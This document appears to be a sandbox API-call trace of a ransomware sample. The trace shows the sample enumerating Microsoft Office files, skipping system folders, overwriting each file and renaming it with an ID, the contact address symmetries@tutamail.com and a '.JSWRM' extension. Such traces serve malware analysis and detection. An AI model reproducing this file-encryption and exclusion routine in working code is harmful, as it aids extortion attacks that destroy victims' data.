SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.773] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.784] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.785] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.785] CloseHandle (hObject=0x238) returned 1 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0113.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0113.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0113.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0113.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.786] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbwiz.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBWIZ.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbwiz.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0113.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0113.786] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45cd2b0, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45cd2b0, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45cd2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DEFAULT.CSS", cAlternateFileName="")) returned 1 [0113.786] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2=".") returned 1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="..") returned 1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="...") returned 1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="windows") returned -1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="recovery") returned -1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="perflogs") returned -1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="documents and settings") returned -1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="$RECYCLE.BIN") returned 1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="system volume information") returned -1 [0113.787] lstrcmpiW (lpString1="DEFAULT.CSS", lpString2="msocache") returned -1 [0113.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEFAULT.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEFAULT.CSS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEFAULT.CSS", lpUsedDefaultChar=0x0) returned 11 [0113.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0113.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEFAULT.CSS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEFAULT.CSS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEFAULT.CSS", lpUsedDefaultChar=0x0) returned 11 [0113.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DEFAULT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\default.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.788] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0113.788] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0113.788] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0113.797] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.797] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0113.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0113.797] CloseHandle (hObject=0x238) returned 1 [0113.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0113.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0113.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0113.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DEFAULT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\default.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DEFAULT.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\default.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0113.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.799] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45cd2b0, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45cd2b0, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45cd2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6bb, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DOORSCHD.VRD", cAlternateFileName="")) returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2=".") returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="..") returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="...") returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="windows") returned -1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="recovery") returned -1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="perflogs") returned -1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="documents and settings") returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="system volume information") returned -1 [0113.799] lstrcmpiW (lpString1="DOORSCHD.VRD", lpString2="msocache") returned -1 [0113.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOORSCHD.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOORSCHD.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOORSCHD.VRD", lpUsedDefaultChar=0x0) returned 12 [0113.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0113.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOORSCHD.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOORSCHD.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOORSCHD.VRD", lpUsedDefaultChar=0x0) returned 12 [0113.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0113.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0113.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\doorschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.800] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1723) returned 1 [0113.800] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b0) returned 0x22d530 [0113.801] ReadFile (in: hFile=0x238, lpBuffer=0x22d530, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x6b0, lpOverlapped=0x0) returned 1 [0113.802] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.802] WriteFile (in: hFile=0x238, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x6b0, lpOverlapped=0x0) returned 1 [0113.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0113.802] CloseHandle (hObject=0x238) returned 1 [0113.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0113.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\doorschd.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DOORSCHD.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\doorschd.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0113.804] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b09036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1b09036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1b09036, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11ca8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DRILLDWN.VSL", cAlternateFileName="")) returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2=".") returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="..") returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="...") returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="windows") returned -1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="recovery") returned -1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="perflogs") returned -1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="documents and settings") returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="system volume information") returned -1 [0113.804] lstrcmpiW (lpString1="DRILLDWN.VSL", lpString2="msocache") returned -1 [0113.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLDWN.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLDWN.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0113.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\drilldwn.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.806] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=72872) returned 1 [0113.806] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11ca0) returned 0x24c1d0 [0113.806] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x11ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x11ca0, lpOverlapped=0x0) returned 1 [0113.812] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.812] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x11ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x11ca0, lpOverlapped=0x0) returned 1 [0113.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.813] CloseHandle (hObject=0x238) returned 1 [0113.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 